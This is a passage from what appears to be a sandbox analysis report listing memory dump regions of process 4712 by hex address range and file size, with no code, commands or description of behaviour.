                                                                              • memory/4712-62-0x00007FFDC5E80000-0x00007FFDC5E99000-memory.dmp

                                                                                Filesize

                                                                                100KB

                                                                              • memory/4712-60-0x00007FFDC1F50000-0x00007FFDC20CD000-memory.dmp

                                                                                Filesize

                                                                                1.5MB

                                                                              • memory/4712-58-0x00007FFDC7390000-0x00007FFDC73AF000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/4712-106-0x00007FFDC1F50000-0x00007FFDC20CD000-memory.dmp

                                                                                Filesize

                                                                                1.5MB

                                                                              • memory/4712-54-0x00007FFDC5F20000-0x00007FFDC5F4C000-memory.dmp

                                                                                Filesize

                                                                                176KB

                                                                              • memory/4712-222-0x00007FFDC1900000-0x00007FFDC19B8000-memory.dmp

                                                                                Filesize

                                                                                736KB

                                                                              • memory/4712-223-0x0000028D9BE60000-0x0000028D9C1D5000-memory.dmp

                                                                                Filesize

                                                                                3.5MB

                                                                              • memory/4712-25-0x00007FFDC19C0000-0x00007FFDC1E26000-memory.dmp

                                                                                Filesize

                                                                                4.4MB

                                                                              • memory/4712-243-0x00007FFDC1580000-0x00007FFDC18F5000-memory.dmp

                                                                                Filesize

                                                                                3.5MB

                                                                              • memory/4712-244-0x00007FFDC19C0000-0x00007FFDC1E26000-memory.dmp

                                                                                Filesize

                                                                                4.4MB

                                                                              • memory/4712-272-0x00007FFDC1460000-0x00007FFDC1578000-memory.dmp

                                                                                Filesize

                                                                                1.1MB

                                                                              • memory/4712-271-0x00007FFDCB3C0000-0x00007FFDCB3CD000-memory.dmp

                                                                                Filesize

                                                                                52KB

                                                                              • memory/4712-270-0x00007FFDC5E60000-0x00007FFDC5E75000-memory.dmp

                                                                                Filesize

                                                                                84KB

                                                                              • memory/4712-269-0x00007FFDC1900000-0x00007FFDC19B8000-memory.dmp

                                                                                Filesize

                                                                                736KB

                                                                              • memory/4712-268-0x00007FFDC5110000-0x00007FFDC513E000-memory.dmp

                                                                                Filesize

                                                                                184KB

                                                                              • memory/4712-267-0x00007FFDCB710000-0x00007FFDCB71D000-memory.dmp

                                                                                Filesize

                                                                                52KB

                                                                              • memory/4712-266-0x00007FFDC5E80000-0x00007FFDC5E99000-memory.dmp

                                                                                Filesize

                                                                                100KB

                                                                              • memory/4712-265-0x00007FFDC1F50000-0x00007FFDC20CD000-memory.dmp

                                                                                Filesize

                                                                                1.5MB

                                                                              • memory/4712-264-0x00007FFDC7390000-0x00007FFDC73AF000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/4712-263-0x00007FFDC74A0000-0x00007FFDC74B8000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/4712-262-0x00007FFDC5F20000-0x00007FFDC5F4C000-memory.dmp

                                                                                Filesize

                                                                                176KB

                                                                              • memory/4712-261-0x00007FFDCB760000-0x00007FFDCB784000-memory.dmp

                                                                                Filesize

                                                                                144KB

                                                                              • memory/4712-260-0x00007FFDCB720000-0x00007FFDCB72F000-memory.dmp

                                                                                Filesize

                                                                                60KB

                                                                              • memory/4712-259-0x00007FFDC1580000-0x00007FFDC18F5000-memory.dmp

                                                                                Filesize

                                                                                3.5MB